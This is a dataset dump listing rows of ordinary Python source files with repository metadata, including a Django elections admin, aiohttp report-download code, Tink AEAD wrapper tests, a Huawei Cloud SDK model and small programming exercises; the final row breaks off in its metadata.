blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0b62db421f1b592394ee367b6221c3e0068a2a38
|
8477ff7ec00bc8307c51d7b5d0af7c35e0fa4758
|
/elecciones/admin.py
|
00a0af34cd8cdf926d224b134d34c7ff55482b93
|
[] |
no_license
|
ciudadanointeligente/votainteligente-primarias
|
afc512fb47075cbc31419361a51b9857d9c8a064
|
11b91990d99b41541b899bfc68d2cbc8fb64a4e1
|
refs/heads/master
| 2021-01-10T19:26:04.374281 | 2013-09-10T20:43:19 | 2013-09-10T20:43:19 | 10,316,015 | 0 | 0 | null | 2013-09-10T20:43:20 | 2013-05-27T14:06:21 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,770 |
py
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from models import *
class ColectivoAdmin(admin.ModelAdmin):
model = Colectivo
admin.site.register(Colectivo,ColectivoAdmin)
class IndiceInline(admin.TabularInline):
model = Indice
class CandidatoInline(admin.TabularInline):
model = Candidato
extra = 0
class PreguntaInline(admin.TabularInline):
model = Pregunta
class RespuestaInline(admin.TabularInline):
model = Respuesta
readonly_fields = ['candidato']
extra = 0
class EleccionAdmin(admin.ModelAdmin):
search_fields = ['nombre', 'candidato__nombre']
inlines = [
CandidatoInline,
IndiceInline
]
admin.site.register(Eleccion, EleccionAdmin)
# action de aprobacion masiva de preguntas
def aprobar_preguntas(modeladmin, request, queryset):
for obj in queryset:
obj.enviar()
obj.procesada=True
obj.aprobada=True
obj.save()
aprobar_preguntas.short_description = "Aprobar Preguntas para enviar"
class PreguntaAdmin(admin.ModelAdmin):
model = Pregunta
list_display = ['texto_pregunta', 'aprobada', 'procesada']
ordering = ['aprobada','procesada']
# readonly_fields = ['procesada']
actions = [aprobar_preguntas]
inlines = [RespuestaInline]
#funcion especial para la aprobación de mail en el admin
def save_model(self, request, obj, form, change):
if obj.aprobada and not obj.procesada:
obj.enviar()
obj.procesada=True
obj.save()
admin.site.register(Pregunta, PreguntaAdmin)
class AreaAdmin(admin.ModelAdmin):
pass
admin.site.register(Area, AreaAdmin)
class DatoAdmin(admin.ModelAdmin):
pass
admin.site.register(Dato, DatoAdmin)
class ContactoAdmin(admin.ModelAdmin):
search_fields = ['valor', 'candidato__nombre']
admin.site.register(Contacto, ContactoAdmin)
|
[
"[email protected]"
] | |
6f22947c146cdb3d4b4e9218a0d8cdabc51ca34a
|
a211aafcd8ae2369cd3289fca6ced287ee09cc26
|
/algos_2/sprint_6_hashes/task_e.py
|
881eb70ff3dc32e6e169dd04b5e31c413aba9309
|
[] |
no_license
|
vitt0ri0/yalgorithms
|
562d27449bbc0907c37d632b6eff4d5dbf9da208
|
1ff6bdc92b61baf03463f299e62c6199d05be040
|
refs/heads/master
| 2023-03-21T21:07:02.339838 | 2021-03-21T13:00:43 | 2021-03-21T13:00:43 | 287,198,070 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 932 |
py
|
def task_e(arr):
if len(arr) < 2:
return 0
prev1 = arr[0]
prev2 = None
counter = 0
i = 1
mmax = 0
while i < len(arr):
el = arr[i]
el2 = arr[i-1]
if counter:
a = (el, el2) == (prev2, prev1)
b = (el, el2) == (prev1, prev2)
if a or b:
counter += 1
prev2 = el
prev1 = el2
i += 1
else:
counter = 0
prev1 = el
elif el != prev1:
counter = 1
prev2 = prev1
prev1 = el
i += 1
else:
prev1 = el
if counter > mmax:
mmax = counter
i += 1
return mmax
if __name__ == '__main__':
arr = [1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0]
n = input()
arr = list(map(int, input().split()))
res = task_e(arr)
print(res)
|
[
"[email protected]"
] | |
222b65cae3e331d1bb9d612840a859b2b8569ee0
|
238eef9423ef2a909d4531bb70b02afda7b25a38
|
/sutils/logger.py
|
33e816e792fd1f10ed271bc0cadfd1b99d080cd0
|
[] |
no_license
|
sunqiang85/spytorch_v2
|
7f8f2209e5c6bc266484a6eebc5992d7accc3616
|
635c18cf2dd56bd92079fe761c70e73743a7890a
|
refs/heads/master
| 2021-05-21T14:51:52.986344 | 2020-04-03T11:13:57 | 2020-04-03T11:13:57 | 252,686,933 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 511 |
py
|
from torch.utils.tensorboard import SummaryWriter
import logging
class Logger():
def __init__(self, __C):
self.__C = __C
self.tensorboard = SummaryWriter(__C.tensorboard_path)
self.filelogger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
fh = logging.FileHandler(__C.log_path, mode='w')
formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
self.filelogger.addHandler(fh)
|
[
"[email protected]"
] | |
3e119cfa6d182283fd4105948f57cc3949392715
|
f6cadae90eb8fa3766acbb00a6c65fd2dfb3cb8d
|
/source/aiocomments/views/user_requests.py
|
5a2aab955d11fec38b9d07f0c05db87df8cf20f5
|
[] |
no_license
|
RTyy/aiocomments
|
e6d3883777116a81653f12f498473883cebecbc4
|
2cb470462dbc1eaafbad1453f8f9050dc33d2412
|
refs/heads/master
| 2020-05-27T21:26:26.497154 | 2017-07-10T09:02:01 | 2017-07-10T09:02:01 | 94,754,607 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,798 |
py
|
"""User Requests Controller."""
import aiofiles
import trafaret as t
from aiohttp.web import StreamResponse, FileResponse
from datetime import datetime
from core.exceptions import CoreException
from core.db import acquire_connection
from ..consumers import DlResponseConsumer
from ..models import UserDlRequest, DlRequest, Comment, Instance, EventLog
@acquire_connection
async def get_user_dlrequests(request, db):
"""Return a list of previously created user request."""
# use trafaret as validator
trafaret = t.Dict({
t.Key('user_id'): t.Int,
})
try:
req = trafaret.check(request.match_info)
requests = DlRequest.list(db).raw.select(
DlRequest.id, DlRequest.itype_id, DlRequest.i_id,
DlRequest.author_id, DlRequest.start, DlRequest.end,
DlRequest.fmt, DlRequest.created) \
.filter(
UserDlRequest.user_id == req['user_id']) \
.order_by(UserDlRequest.created.desc())
return await requests
except t.DataError as e:
raise CoreException(400, 'Bad Request', e.as_dict())
@acquire_connection
async def download(request, db):
"""Prepare and return report according to request params."""
# use trafaret as validator
trafaret = t.Dict({
t.Key('user_id'): t.Int,
t.Key('start', optional=True, default=None): (t.Int | t.Null),
t.Key('end', optional=True, default=None): (t.Int | t.Null),
t.Key('author_id', optional=True, default=None): (t.Int | t.Null),
t.Key('i_id', optional=True, default=None): (t.Int | t.Null),
# 0 or unspecified means "comment"
t.Key('itype_id', optional=True, default=0): t.Int,
})
trafaret_format = t.Dict({
# t.Key('format', optional=True, default='xml'): t.Enum('xml'),
t.Key('format', optional=True,
default='xml'): lambda d: \
DlRequest.Format.by_verbose(d, DlRequest.Format.XML),
})
try:
req = trafaret.check(request.query)
if not req['i_id'] and not req['author_id']:
raise CoreException(400, 'Bad Request', {
'_': 'Instance or Author should be specidied.'})
req_fmt = trafaret_format.check(request.match_info).get('format')
root = None
# try to get previously stored request
try:
# make a filter
flt = DlRequest.fmt == req_fmt
if req['i_id']:
# make sure that requested instance exists.
if req['itype_id'] == 0:
root = await Comment.list(db).get(
Comment.id == req['i_id'])
else:
root = await Instance.list(db).get(
(Instance.i_id == req['i_id']) &
(Instance.itype_id == req['itype_id']))
flt &= (DlRequest.i_id == req['i_id']) \
& (DlRequest.itype_id == req['itype_id'])
if req['author_id']:
flt &= DlRequest.author_id == req['author_id']
if req['start'] is not None:
req['start'] = datetime.fromtimestamp(req['start'] / 1000)
flt &= (DlRequest.start == req['start'])
if req['end'] is not None:
req['end'] = datetime.fromtimestamp(req['end'] / 1000)
flt &= (DlRequest.end == req['end'])
dlreq = await DlRequest.list(db).get(flt)
# get user download request
try:
udlreq = await UserDlRequest.list(db).get(
(UserDlRequest.user_id == req['user_id']) &
(UserDlRequest.dlrequest_id == dlreq.id)
)
except UserDlRequest.DoesNotExist:
# crate a new one
udlreq = UserDlRequest(user_id=req['user_id'],
dlrequest_id=dlreq.id)
await udlreq.save(db)
except DlRequest.DoesNotExist:
# create both new download request and its link to the user
dlreq = DlRequest(**req)
dlreq.fmt = req_fmt
await dlreq.save(db, request.app['fs'])
udlreq = UserDlRequest(user_id=req['user_id'],
dlrequest_id=dlreq.id)
await udlreq.save(db)
except (Comment.DoesNotExist, Instance.DoesNotExist):
raise CoreException(404, 'Root Instance Not Found')
# proceed with request validation
# make sure there are no events that could affect
# previously generated report
if dlreq.state == DlRequest.State.VALID:
# build events query based on DlRequest params
events = EventLog.list(db).filter(EventLog.e_date > dlreq.created)
if root is not None:
events = events.filter(EventLog.tree_id == root.tree_id)
if dlreq.author_id:
events = events.filter(EventLog.author_id == dlreq.author_id)
if dlreq.start:
if dlreq.end:
events = events.filter(
EventLog.comment_cdate.between(dlreq.start, dlreq.end))
else:
events = events.filter(
EventLog.comment_cdate >= dlreq.start)
elif dlreq.end:
events = events.filter(EventLog.comment_cdate <= dlreq.end)
# check the number of events which affected
# previously generated report
if await events.count() > 0:
# mark report invalid if there at least one event found
dlreq.state = DlRequest.State.INVALID
await dlreq.save(db, request.app['fs'])
# prepare requested report
report_filename = 'report'
report_filepath = request.app['fs'].path(dlreq.filename)
# if req['author_id']:
# report_filename += '-user%s' % req['author_id']
# if req['i_id']:
# report_filename += '-comment%s' % i_id if req['type_id'] == 0 \
# else '-instance%s(%s)' % (req['i_id'], req['itype_id'])
headers = {
'Content-Type': 'text/xml',
'Content-Disposition':
'attachment; filename="%s.xml"' % report_filename,
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
# is_valid flag telling us if requested report was generated
# and if it's still valid (there were no updates or new comments
# created within a period specified by the request)
if dlreq.state == DlRequest.State.VALID:
# return a pure FileResponse
return FileResponse(report_filepath, headers=headers)
else:
stream = StreamResponse(status=200, reason='OK', headers=headers)
# stream.enable_chunked_encoding()
await stream.prepare(request)
# here we will await for the message from the report builder
# over local pubsub service
await DlResponseConsumer(dlreq.id, loop=request.app.loop).run()
# stream generated report file
async with aiofiles.open(request.app['fs'].path(dlreq.filename),
'r') as fd:
while True:
chunk = await fd.read(1024)
if not chunk:
break
stream.write(chunk.encode('utf-8'))
# yield to the scheduler so other processes do stuff.
await stream.drain()
await stream.write_eof()
return stream
except t.DataError as e:
raise CoreException(400, 'Bad Request', e.as_dict())
|
[
"[email protected]"
] | |
416b6e3bfd65de33b7549956af8ebdb24642ebc6
|
6cfcf1b6ef7afe49eebe4edbd21184fc914c7755
|
/Exercicios/ex024.py
|
a340c88d759c0fc679b1a895d2a9b21fbe5500a7
|
[] |
no_license
|
mmagalha/Python
|
254df310a2a4f79258638321094296860bf4097a
|
95cbcc57c6f26d37954bc8835da885d32b4e607e
|
refs/heads/master
| 2021-05-02T07:42:56.872807 | 2018-02-12T01:05:02 | 2018-02-12T01:05:02 | 118,944,792 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 208 |
py
|
#Exercício Python 024: Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome "SANTO".
cidade = str(input("Digite o nome da sua cidade: ")).upper()
print(cidade[:5] == "SANTO")
|
[
"[email protected]"
] | |
1b0b318977f920b37ea3424f58bc5c6b179df0c8
|
1eaf99e876b5fc5b05de1b41014dca6efc6601f1
|
/cupcake.py
|
23923a460a24f77dd8a4d3e9eda0372799595992
|
[] |
no_license
|
puspita-sahoo/codechef_program
|
5466dfc675e11b276a76d30fd8a3787fa106590a
|
1fae1e9b89ebedb963216e5e79a673716e8b5cc9
|
refs/heads/master
| 2023-08-21T15:01:42.804814 | 2021-09-10T17:47:26 | 2021-09-10T17:47:26 | 405,164,524 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 94 |
py
|
T = int(input())
for i in range(T):
N = int(input())
ap = (N//2) + 1
print(ap)
|
[
"[email protected]"
] | |
df0300b9ae066ae31618798f45525e2480426413
|
7a1b08c64b29522d4bbb913475275c1bc8ad61a4
|
/patient_agenda/events/doc_events/conver_value.py
|
afcdc7008de591882958f1eb59c25de32cecb141
|
[
"MIT"
] |
permissive
|
erichilarysmithsr/time-track
|
8f84d4cc92cebaedce550b3741982d204e734a6c
|
dc0a7b63c937d561309f9b1c84af65fb581a8e18
|
refs/heads/master
| 2023-03-27T08:07:46.717221 | 2021-03-30T16:45:50 | 2021-03-30T16:45:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,695 |
py
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import os
import json
import subprocess
try:
with open('./patient_agenda/events/doc_events/patient_rdv.json') as file:
data=json.load(file)
except FileNotFoundError as fileout:
print("File 1 patient_rdv.json not created", fileout)
for value in data:
print(value)
data_list1 = []
for value in data:
data_list1.append(value[1])
data_day = data_list1[0]
data_month = data_list1[1]
data_year = data_list1[2]
try:
if data_day < 10:
extraday = '0' +''+ str(data_day)
elif data_day >= 10:
extraday = str(data_day)
else:
pass
except ValueError as valout:
print("Value of day is a problem", valout)
try:
if data_month < 10:
extramounth = '0' +''+ str(data_month)
elif data_month >= 10:
extramounth = str(data_month)
else:
pass
except ValueError as valout:
print("Value of mounth is a problem", valout)
# initword = "Appointment set for :"
# initword +' '+
final_data = extraday +'/'+ extramounth +'/'+ str(data_year) +' :'
print(final_data)
try:
if os.path.getsize('./patient_agenda/events/doc_events/fix_agenda/patient_value.json'):
print("+ File 'value' exist !")
with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json','w') as partytime:
json.dump(final_data, partytime)
except FileNotFoundError as msg:
print("File doesn't exist, but it has been created !")
with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json','w') as partyleft:
json.dump(final_data, partyleft)
subprocess.call('./patient_agenda/events/doc_events/fix_agenda/extend_agenda.py')
|
[
"[email protected]"
] | |
d1e21770e28bf318bb9670ca416bde39191d4f7d
|
6e0108c11132e63c81adbfab4309011b1f9f6dda
|
/tests/python/extra/clear_leaves.py
|
4d2f1e3a58a3fcb2fd07655efd2646b28d0a5f5f
|
[
"Apache-2.0"
] |
permissive
|
scottdonaldau/ledger-qrl
|
c28a614ae52c44e53947e444abf078ec27041815
|
7a3b933b84065b9db2b775d50205efcdbed2399e
|
refs/heads/master
| 2020-04-12T07:12:25.687015 | 2018-12-19T02:55:43 | 2018-12-19T02:55:43 | 162,360,262 | 0 | 0 |
Apache-2.0
| 2018-12-19T00:15:27 | 2018-12-19T00:15:27 | null |
UTF-8
|
Python
| false | false | 269 |
py
|
from pyledgerqrl.ledgerqrl import *
dev = LedgerQRL()
start = time.time()
for i in range(256):
data = bytearray([i]) + bytearray.fromhex("00" * 32)
answer = dev.send(INS_TEST_WRITE_LEAF, data)
assert len(answer) == 0
answer = dev.send(INS_TEST_PK_GEN_1)
|
[
"[email protected]"
] | |
020e659363902ab2305fccbb021c6b361e707718
|
8db243a61d43e133aac01a67294d26df3381a8f5
|
/Recursion/BinarySearch_Recursion.py
|
2cca8e334ec83ad6effa671540e35b2e6d6a31c0
|
[] |
no_license
|
Jyoti1706/Algortihms-and-Data-Structures
|
ccdd93ad0811585f9b3e1e9f639476ccdf15a359
|
3458a80e02b9957c9aeaf00bf691cc7aebfd3bff
|
refs/heads/master
| 2023-06-21T18:07:13.419498 | 2023-06-16T17:42:55 | 2023-06-16T17:42:55 | 149,984,584 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 463 |
py
|
def Binary_Search_Recursion(arr, lo, hi, target):
if lo > hi:
return -1
mid = (lo+hi)//2
if arr[mid] == target:
return mid
elif arr[mid]>target:
hi = mid-1
return Binary_Search_Recursion(arr, lo, hi, target)
else:
lo=lo+1
return Binary_Search_Recursion(arr, lo, hi, target)
arr = [-1,0,1,2,3,4,7,9,10,20]
target = 10
print(f"index of target is :: {Binary_Search_Recursion(arr,0, len(arr),10)}")
|
[
"[email protected]"
] | |
e4f2ffff2bf16986aa3131d71811dfb973f65ef7
|
9d126bd1569104d953f59005cae73197678c1566
|
/n-apekatter.py
|
35d7c584585e02c3aa2ee4b038a0ad99058296a4
|
[] |
no_license
|
supermons/n-apekatter
|
75e84a9b5b9b3833e06b8a8bbdd00cb8716a4737
|
db78878e3e8913117e9b3a04e36ad67b686e9844
|
refs/heads/master
| 2020-04-01T07:54:38.056944 | 2018-10-14T19:35:57 | 2018-10-14T19:35:57 | 153,009,295 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 496 |
py
|
n = 5
while n != 0:
if n == 1:
print("En liten apekatt sitter i ett tre")
print("Den erter krokodillen: 'Du kan ikke ta meg ned'")
else:
print(str(n) + " små apekatter sitter i ett tre")
print("De erter krokodillen: 'Du kan ikke ta oss ned'")
print("Sa kom krokodillen, så diger og så svær og slurp!")
n = n - 1
if n == 0:
print("Da var det ingen apekatter der")
else:
print("Så var de bare " + str(n) + " apekatter der")
print("\n")
|
[
"[email protected]"
] | |
55559c3ca1ad5ff7d80c5cf736dab7da2c5d72a7
|
dfff816642f4e1afeab268f441906a6d811d3fb4
|
/polling_stations/apps/data_collection/management/commands/import_newham.py
|
d1463f346e39dd465ff77e53dbf91e637072ccae
|
[] |
permissive
|
mtravis/UK-Polling-Stations
|
2c07e03d03959492c7312e5a4bfbb71e12320432
|
26e0331dc29253dc436a0462ffaa01e974c5dc52
|
refs/heads/master
| 2020-05-14T18:36:31.501346 | 2019-04-17T12:54:57 | 2019-04-17T12:54:57 | 181,912,382 | 0 | 0 |
BSD-3-Clause
| 2019-04-17T14:48:26 | 2019-04-17T14:48:26 | null |
UTF-8
|
Python
| false | false | 1,255 |
py
|
from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E09000025"
addresses_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV"
stations_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV"
elections = ["local.2018-05-03", "mayor.newham.2018-05-03"]
csv_delimiter = "\t"
def address_record_to_dict(self, record):
if record.addressline6 == "E16 1EF":
return None
if record.property_urn == "10090852604":
return None
if record.property_urn == "10034510101":
rec = super().address_record_to_dict(record)
rec["postcode"] = "E13 8NA"
return rec
if record.addressline6 == "E16 1XF":
return None
if record.property_urn == "10090756946":
rec = super().address_record_to_dict(record)
rec["postcode"] = "E7 9AW"
return rec
if record.property_urn == "10023994990":
rec = super().address_record_to_dict(record)
rec["postcode"] = "E7 9AW"
return rec
return super().address_record_to_dict(record)
|
[
"[email protected]"
] | |
0048953dec39f492a91c8bdde7a9ddaca57537a1
|
5d4753b7e463827c9540e982108de22f62435c3f
|
/python/tink/daead/_deterministic_aead_wrapper_test.py
|
b59d11dca3c7331a23581b856195197dfeb49b72
|
[
"Apache-2.0"
] |
permissive
|
thaidn/tink
|
8c9b65e3f3914eb54d70847c9f56853afd051dd3
|
2a75c1c3e4ef6aa1b6e29700bf5946b725276c95
|
refs/heads/master
| 2021-07-25T02:02:59.839232 | 2021-02-10T17:21:31 | 2021-02-10T17:22:01 | 337,815,957 | 2 | 0 |
Apache-2.0
| 2021-02-10T18:28:20 | 2021-02-10T18:28:20 | null |
UTF-8
|
Python
| false | false | 6,074 |
py
|
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.python.tink.aead_wrapper."""
from __future__ import absolute_import
from __future__ import division
# Placeholder for import for type annotations
from __future__ import print_function
from absl.testing import absltest
from absl.testing import parameterized
import tink
from tink import daead
from tink.testing import keyset_builder
DAEAD_TEMPLATE = daead.deterministic_aead_key_templates.AES256_SIV
RAW_DAEAD_TEMPLATE = keyset_builder.raw_template(DAEAD_TEMPLATE)
def setUpModule():
daead.register()
class AeadWrapperTest(parameterized.TestCase):
@parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
def test_encrypt_decrypt(self, template):
keyset_handle = tink.new_keyset_handle(template)
primitive = keyset_handle.primitive(daead.DeterministicAead)
ciphertext = primitive.encrypt_deterministically(
b'plaintext', b'associated_data')
self.assertEqual(
primitive.decrypt_deterministically(ciphertext, b'associated_data'),
b'plaintext')
@parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
def test_decrypt_unknown_ciphertext_fails(self, template):
unknown_handle = tink.new_keyset_handle(template)
unknown_primitive = unknown_handle.primitive(daead.DeterministicAead)
unknown_ciphertext = unknown_primitive.encrypt_deterministically(
b'plaintext', b'associated_data')
keyset_handle = tink.new_keyset_handle(template)
primitive = keyset_handle.primitive(daead.DeterministicAead)
with self.assertRaises(tink.TinkError):
primitive.decrypt_deterministically(unknown_ciphertext,
b'associated_data')
@parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE])
def test_decrypt_wrong_associated_data_fails(self, template):
keyset_handle = tink.new_keyset_handle(template)
primitive = keyset_handle.primitive(daead.DeterministicAead)
ciphertext = primitive.encrypt_deterministically(b'plaintext',
b'associated_data')
with self.assertRaises(tink.TinkError):
primitive.decrypt_deterministically(ciphertext, b'wrong_associated_data')
@parameterized.parameters([(DAEAD_TEMPLATE, DAEAD_TEMPLATE),
(RAW_DAEAD_TEMPLATE, DAEAD_TEMPLATE),
(DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE),
(RAW_DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE)])
def test_encrypt_decrypt_with_key_rotation(self, template1, template2):
builder = keyset_builder.new_keyset_builder()
older_key_id = builder.add_new_key(template1)
builder.set_primary_key(older_key_id)
p1 = builder.keyset_handle().primitive(daead.DeterministicAead)
newer_key_id = builder.add_new_key(template2)
p2 = builder.keyset_handle().primitive(daead.DeterministicAead)
builder.set_primary_key(newer_key_id)
p3 = builder.keyset_handle().primitive(daead.DeterministicAead)
builder.disable_key(older_key_id)
p4 = builder.keyset_handle().primitive(daead.DeterministicAead)
self.assertNotEqual(older_key_id, newer_key_id)
# p1 encrypts with the older key. So p1, p2 and p3 can decrypt it,
# but not p4.
ciphertext1 = p1.encrypt_deterministically(b'plaintext', b'ad')
self.assertEqual(p1.decrypt_deterministically(ciphertext1, b'ad'),
b'plaintext')
self.assertEqual(p2.decrypt_deterministically(ciphertext1, b'ad'),
b'plaintext')
self.assertEqual(p3.decrypt_deterministically(ciphertext1, b'ad'),
b'plaintext')
with self.assertRaises(tink.TinkError):
_ = p4.decrypt_deterministically(ciphertext1, b'ad')
# p2 encrypts with the older key. So p1, p2 and p3 can decrypt it,
# but not p4.
ciphertext2 = p2.encrypt_deterministically(b'plaintext', b'ad')
self.assertEqual(p1.decrypt_deterministically(ciphertext2, b'ad'),
b'plaintext')
self.assertEqual(p2.decrypt_deterministically(ciphertext2, b'ad'),
b'plaintext')
self.assertEqual(p3.decrypt_deterministically(ciphertext2, b'ad'),
b'plaintext')
with self.assertRaises(tink.TinkError):
_ = p4.decrypt_deterministically(ciphertext2, b'ad')
# p3 encrypts with the newer key. So p2, p3 and p4 can decrypt it,
# but not p1.
ciphertext3 = p3.encrypt_deterministically(b'plaintext', b'ad')
with self.assertRaises(tink.TinkError):
_ = p1.decrypt_deterministically(ciphertext3, b'ad')
self.assertEqual(p2.decrypt_deterministically(ciphertext3, b'ad'),
b'plaintext')
self.assertEqual(p3.decrypt_deterministically(ciphertext3, b'ad'),
b'plaintext')
self.assertEqual(p4.decrypt_deterministically(ciphertext3, b'ad'),
b'plaintext')
# p4 encrypts with the newer key. So p2, p3 and p4 can decrypt it,
# but not p1.
ciphertext4 = p4.encrypt_deterministically(b'plaintext', b'ad')
with self.assertRaises(tink.TinkError):
_ = p1.decrypt_deterministically(ciphertext4, b'ad')
self.assertEqual(p2.decrypt_deterministically(ciphertext4, b'ad'),
b'plaintext')
self.assertEqual(p3.decrypt_deterministically(ciphertext4, b'ad'),
b'plaintext')
self.assertEqual(p4.decrypt_deterministically(ciphertext4, b'ad'),
b'plaintext')
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
f487b32d187d8c46617f40bfa556df73ae0f4374
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/list_batch_jobs_response.py
|
c820f1d45d59dffa07e947b9b3b4e80b79e3084e
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 |
NOASSERTION
| 2023-06-22T14:50:48 | 2020-05-08T02:28:43 |
Python
|
UTF-8
|
Python
| false | false | 3,929 |
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListBatchJobsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'count': 'int',
'jobs': 'list[Job]'
}
attribute_map = {
'count': 'count',
'jobs': 'jobs'
}
def __init__(self, count=None, jobs=None):
"""ListBatchJobsResponse
The model defined in huaweicloud sdk
:param count: 定时作业总个数。
:type count: int
:param jobs:
:type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
"""
super(ListBatchJobsResponse, self).__init__()
self._count = None
self._jobs = None
self.discriminator = None
if count is not None:
self.count = count
if jobs is not None:
self.jobs = jobs
@property
def count(self):
"""Gets the count of this ListBatchJobsResponse.
定时作业总个数。
:return: The count of this ListBatchJobsResponse.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this ListBatchJobsResponse.
定时作业总个数。
:param count: The count of this ListBatchJobsResponse.
:type count: int
"""
self._count = count
@property
def jobs(self):
"""Gets the jobs of this ListBatchJobsResponse.
:return: The jobs of this ListBatchJobsResponse.
:rtype: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
"""
return self._jobs
@jobs.setter
def jobs(self, jobs):
"""Sets the jobs of this ListBatchJobsResponse.
:param jobs: The jobs of this ListBatchJobsResponse.
:type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`]
"""
self._jobs = jobs
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListBatchJobsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
90915e0a41438c2373e73cc3ba2e72afdaca1b45
|
1ee6f343c9e7173b89993e3acca185f45a6ffda7
|
/client_side/main.py
|
a69c15b1bca5a629f2b1c324619717dc4400dfdc
|
[
"MIT"
] |
permissive
|
gmillia/IRC
|
351a8352112a65fde76ab89addc2d18658f13af4
|
4c7f099ada266830d47c558c37078b107789c48d
|
refs/heads/master
| 2022-09-18T21:54:30.494942 | 2020-06-01T01:46:43 | 2020-06-01T01:46:43 | 265,183,836 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 109 |
py
|
from client import Client
if __name__ == "__main__":
client_instance = Client()
client_instance.menu()
|
[
"[email protected]"
] | |
f7a133da42b483bbd6721ea185ae86310461ffcc
|
1eb2d7d2a6e945a9bc487afcbc51daefd9af02e6
|
/algorithm/zhang/baiduface.py
|
aae543c80ba05cfedc089fe690d2f4beb4954ca2
|
[] |
no_license
|
fengges/eds
|
11dc0fdc7a17b611af1f61894f497ad443439bfe
|
635bcf015e3ec12e96949632c546d29fc99aee31
|
refs/heads/master
